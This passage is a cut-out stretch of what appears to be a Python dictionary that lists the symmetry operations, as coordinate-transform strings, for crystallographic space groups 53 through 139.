'-x,y,z'],
54: ['x,y,z', '-x+1/2,-y,z', '-x,y,-z+1/2', 'x+1/2,-y,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z', 'x,-y,z+1/2',
'-x+1/2,y,z+1/2'],
55: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x,y,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z'],
56: ['x,y,z', '-x+1/2,-y+1/2,z', '-x,y+1/2,-z+1/2', 'x+1/2,-y,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z',
'x,-y+1/2,z+1/2', '-x+1/2,y,z+1/2'],
57: ['x,y,z', '-x,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z', '-x,-y,-z', 'x,y,-z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z'],
58: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x,-y,-z', 'x,y,-z',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
59: ['x,y,z', '-x+1/2,-y+1/2,z', '-x,y+1/2,-z', 'x+1/2,-y,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'x,-y+1/2,z',
'-x+1/2,y,z'],
60: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-x,y,-z+1/2', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z+1/2',
'x,-y,z+1/2', '-x+1/2,y+1/2,z'],
61: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z'],
62: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z', 'x+1/2,-y+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'x,-y+1/2,z', '-x+1/2,y+1/2,z+1/2'],
63: ['x,y,z', '-x,-y,z+1/2', '-x,y,-z+1/2', 'x,-y,-z', '-x,-y,-z', 'x,y,-z+1/2', 'x,-y,z+1/2', '-x,y,z',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z'],
64: ['x,y,z', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y,-z', '-x,-y,-z', 'x,y+1/2,-z+1/2', 'x,-y+1/2,z+1/2',
'-x,y,z', 'x+1/2,y+1/2,z', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y+1/2,z'],
65: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z',
'-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,-z',
'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
66: ['x,y,z', '-x,-y,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z+1/2', '-x,y,z+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
67: ['x,y,z', '-x,-y+1/2,z', '-x,y+1/2,-z', 'x,-y,-z', '-x,-y,-z', 'x,y+1/2,-z', 'x,-y+1/2,z', '-x,y,z',
'x+1/2,y+1/2,z', '-x+1/2,-y,z', '-x+1/2,y,-z', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z', 'x+1/2,y,-z',
'x+1/2,-y,z', '-x+1/2,y+1/2,z'],
68: ['x,y,z', '-x+1/2,-y,z', '-x,y,-z+1/2', 'x+1/2,-y,-z+1/2', '-x,-y,-z', 'x+1/2,y,-z', 'x,-y,z+1/2',
'-x+1/2,y,z+1/2', 'x+1/2,y+1/2,z', '-x,-y+1/2,z', '-x+1/2,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2',
'-x+1/2,-y+1/2,-z', 'x,y+1/2,-z', 'x+1/2,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
69: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', 'x,y+1/2,z+1/2',
'-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2', '-x,-y+1/2,-z+1/2', 'x,y+1/2,-z+1/2',
'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2',
'x+1/2,-y,-z+1/2', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z'],
70: ['x,y,z', '-x+3/4,-y+3/4,z', '-x+3/4,y,-z+3/4', 'x,-y+3/4,-z+3/4', '-x,-y,-z', 'x+1/4,y+1/4,-z',
'x+1/4,-y,z+1/4', '-x,y+1/4,z+1/4', 'x,y+1/2,z+1/2', '-x+3/4,-y+1/4,z+1/2', '-x+3/4,y+1/2,-z+1/4',
'x,-y+1/4,-z+1/4', '-x,-y+1/2,-z+1/2', 'x+1/4,y+3/4,-z+1/2', 'x+1/4,-y+1/2,z+3/4', '-x,y+3/4,z+3/4',
'x+1/2,y,z+1/2', '-x+1/4,-y+3/4,z+1/2', '-x+1/4,y,-z+1/4', 'x+1/2,-y+3/4,-z+1/4', '-x+1/2,-y,-z+1/2',
'x+3/4,y+1/4,-z+1/2', 'x+3/4,-y,z+3/4', '-x+1/2,y+1/4,z+3/4', 'x+1/2,y+1/2,z', '-x+1/4,-y+1/4,z',
'-x+1/4,y+1/2,-z+3/4', 'x+1/2,-y+1/4,-z+3/4', '-x+1/2,-y+1/2,-z', 'x+3/4,y+3/4,-z', 'x+3/4,-y+1/2,z+1/4',
'-x+1/2,y+3/4,z+1/4'],
71: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2'],
72: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x,y,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-x,y,-z+1/2', 'x,-y,-z+1/2',
'-x+1/2,-y+1/2,-z+1/2', 'x+1/2,y+1/2,-z+1/2', 'x,-y,z+1/2', '-x,y,z+1/2'],
73: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', 'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2',
'-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'x+1/2,-y,z', '-x,y,z+1/2'],
74: ['x,y,z', '-x,-y+1/2,z', '-x,y+1/2,-z', 'x,-y,-z', '-x,-y,-z', 'x,y+1/2,-z', 'x,-y+1/2,z', '-x,y,z',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y+1/2,z+1/2'],
75: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z'],
76: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+1/4', 'y,-x,z+3/4'],
77: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2'],
78: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+3/4', 'y,-x,z+1/4'],
79: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2',
'y+1/2,-x+1/2,z+1/2'],
80: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', 'x+1/2,y+1/2,z+1/2', '-x,-y,z',
'-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4'],
81: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z'],
82: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2'],
83: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z'],
84: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2'],
85: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z',
'-y,x+1/2,-z'],
86: ['x,y,z', '-x+1/2,-y+1/2,z', '-y,x+1/2,z+1/2', 'y+1/2,-x,z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z',
'y,-x+1/2,-z+1/2', '-y+1/2,x,-z+1/2'],
87: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2'],
88: ['x,y,z', '-x+1/2,-y,z+1/2', '-y+3/4,x+1/4,z+1/4', 'y+3/4,-x+3/4,z+3/4', '-x,-y,-z', 'x+1/2,y,-z+1/2',
'y+1/4,-x+3/4,-z+3/4', '-y+1/4,x+1/4,-z+1/4', 'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-y+1/4,x+3/4,z+3/4',
'y+1/4,-x+1/4,z+1/4', '-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'y+3/4,-x+1/4,-z+1/4', '-y+3/4,x+3/4,-z+3/4'],
89: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z'],
90: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z', 'y+1/2,-x+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'y,x,-z',
'-y,-x,-z'],
91: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+1/4', 'y,-x,z+3/4', '-x,y,-z', 'x,-y,-z+1/2', 'y,x,-z+3/4',
'-y,-x,-z+1/4'],
92: ['x,y,z', '-x,-y,z+1/2', '-y+1/2,x+1/2,z+1/4', 'y+1/2,-x+1/2,z+3/4', '-x+1/2,y+1/2,-z+1/4',
'x+1/2,-y+1/2,-z+3/4', 'y,x,-z', '-y,-x,-z+1/2'],
93: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,y,-z', 'x,-y,-z', 'y,x,-z+1/2', '-y,-x,-z+1/2'],
94: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'y,x,-z', '-y,-x,-z'],
95: ['x,y,z', '-x,-y,z+1/2', '-y,x,z+3/4', 'y,-x,z+1/4', '-x,y,-z', 'x,-y,-z+1/2', 'y,x,-z+1/4',
'-y,-x,-z+3/4'],
96: ['x,y,z', '-x,-y,z+1/2', '-y+1/2,x+1/2,z+3/4', 'y+1/2,-x+1/2,z+1/4', '-x+1/2,y+1/2,-z+3/4',
'x+1/2,-y+1/2,-z+1/4', 'y,x,-z', '-y,-x,-z+1/2'],
97: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2'],
98: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', '-x+1/2,y,-z+3/4', 'x,-y+1/2,-z+1/4',
'y+1/2,x+1/2,-z+1/2', '-y,-x,-z', 'x+1/2,y+1/2,z+1/2', '-x,-y,z', '-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4',
'-x,y+1/2,-z+1/4', 'x+1/2,-y,-z+3/4', 'y,x,-z', '-y+1/2,-x+1/2,-z+1/2'],
99: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z'],
100: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', '-y+1/2,-x+1/2,z',
'y+1/2,x+1/2,z'],
101: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z', 'y,x,z'],
102: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2', '-y,-x,z', 'y,x,z'],
103: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2'],
104: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2',
'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
105: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', 'x,-y,z', '-x,y,z', '-y,-x,z+1/2', 'y,x,z+1/2'],
106: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z',
'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
107: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
108: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', '-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z'],
109: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', 'x,-y,z', '-x+1/2,y+1/2,z+1/2',
'-y,-x+1/2,z+1/4', 'y+1/2,x,z+3/4', 'x+1/2,y+1/2,z+1/2', '-x,-y,z', '-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4',
'x+1/2,-y+1/2,z+1/2', '-x,y,z', '-y+1/2,-x,z+3/4', 'y,x+1/2,z+1/4'],
110: ['x,y,z', '-x+1/2,-y+1/2,z+1/2', '-y,x+1/2,z+1/4', 'y+1/2,-x,z+3/4', 'x,-y,z+1/2', '-x+1/2,y+1/2,z',
'-y,-x+1/2,z+3/4', 'y+1/2,x,z+1/4', 'x+1/2,y+1/2,z+1/2', '-x,-y,z', '-y+1/2,x,z+3/4', 'y,-x+1/2,z+1/4',
'x+1/2,-y+1/2,z', '-x,y,z+1/2', '-y+1/2,-x,z+1/4', 'y,x+1/2,z+3/4'],
111: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x,y,-z', 'x,-y,-z', '-y,-x,z', 'y,x,z'],
112: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x,y,-z+1/2', 'x,-y,-z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2'],
113: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', '-y+1/2,-x+1/2,z',
'y+1/2,x+1/2,z'],
114: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2',
'-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
115: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', 'y,x,-z', '-y,-x,-z'],
116: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2'],
117: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'y+1/2,x+1/2,-z',
'-y+1/2,-x+1/2,-z'],
118: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2'],
119: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', 'y,x,-z', '-y,-x,-z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,z+1/2', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2'],
120: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2',
'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z'],
121: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x,y,-z', 'x,-y,-z', '-y,-x,z', 'y,x,z', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
122: ['x,y,z', '-x,-y,z', 'y,-x,-z', '-y,x,-z', '-x+1/2,y,-z+3/4', 'x+1/2,-y,-z+3/4', '-y+1/2,-x,z+3/4',
'y+1/2,x,z+3/4', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', '-x,y+1/2,-z+1/4', 'x,-y+1/2,-z+1/4', '-y,-x+1/2,z+1/4', 'y,x+1/2,z+1/4'],
123: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z', '-x,-y,-z', 'x,y,-z',
'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z'],
124: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z+1/2', 'x,-y,-z+1/2', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z+1/2', 'y,x,z+1/2'],
125: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x+1/2,y,-z', 'x,-y+1/2,-z', 'y,x,-z',
'-y+1/2,-x+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z', 'x+1/2,-y,z',
'-x,y+1/2,z', '-y,-x,z', 'y+1/2,x+1/2,z'],
126: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2',
'y,x,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z',
'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-y,-x,z+1/2', 'y+1/2,x+1/2,z+1/2'],
127: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'y+1/2,x+1/2,-z',
'-y+1/2,-x+1/2,-z', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z',
'-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z'],
128: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x,y,-z', 'y,-x,-z', '-y,x,-z',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
129: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x,y+1/2,-z', 'x+1/2,-y,-z', 'y+1/2,x+1/2,-z',
'-y,-x,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z', 'x,-y+1/2,z', '-x+1/2,y,z',
'-y+1/2,-x+1/2,z', 'y,x,z'],
130: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z', 'y,-x+1/2,z', '-x,y+1/2,-z+1/2', 'x+1/2,-y,-z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y,-x,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z', '-y,x+1/2,-z',
'x,-y+1/2,z+1/2', '-x+1/2,y,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y,x,z+1/2'],
131: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,y,-z', 'x,-y,-z', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2', 'x,-y,z', '-x,y,z', '-y,-x,z+1/2', 'y,x,z+1/2'],
132: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x,y,-z+1/2', 'x,-y,-z+1/2', 'y,x,-z', '-y,-x,-z',
'-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2', 'x,-y,z+1/2', '-x,y,z+1/2', '-y,-x,z', 'y,x,z'],
133: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x+1/2,y,-z', 'x,-y+1/2,-z',
'y,x,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x+1/2,-y,z', '-x,y+1/2,z', '-y,-x,z+1/2', 'y+1/2,x+1/2,z+1/2'],
134: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2',
'y,x,-z', '-y+1/2,-x+1/2,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-y,-x,z', 'y+1/2,x+1/2,z'],
135: ['x,y,z', '-x,-y,z', '-y,x,z+1/2', 'y,-x,z+1/2', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x,-y,-z', 'x,y,-z', 'y,-x,-z+1/2', '-y,x,-z+1/2',
'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2'],
136: ['x,y,z', '-x,-y,z', '-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,-z+1/2', 'y,x,-z', '-y,-x,-z', '-x,-y,-z', 'x,y,-z', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-y,-x,z', 'y,x,z'],
137: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x,y+1/2,-z', 'x+1/2,-y,-z',
'y+1/2,x+1/2,-z+1/2', '-y,-x,-z+1/2', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x,-y+1/2,z', '-x+1/2,y,z', '-y+1/2,-x+1/2,z+1/2', 'y,x,z+1/2'],
138: ['x,y,z', '-x+1/2,-y+1/2,z', '-y+1/2,x,z+1/2', 'y,-x+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y,-z+1/2',
'y+1/2,x+1/2,-z', '-y,-x,-z', '-x,-y,-z', 'x+1/2,y+1/2,-z', 'y+1/2,-x,-z+1/2', '-y,x+1/2,-z+1/2',
'x,-y+1/2,z+1/2', '-x+1/2,y,z+1/2', '-y+1/2,-x+1/2,z', 'y,x,z'],
139: ['x,y,z', '-x,-y,z', '-y,x,z', 'y,-x,z', '-x,y,-z', 'x,-y,-z', 'y,x,-z', '-y,-x,-z', '-x,-y,-z', 'x,y,-z',
'y,-x,-z', '-y,x,-z', 'x,-y,z', '-x,y,z', '-y,-x,z', 'y,x,z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'y+1/2,-x+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2',
'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', '-x+1/2,-y+1/2,-z+1/2', 'x+1/2,y+1/2,-z+1/2',
'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2',
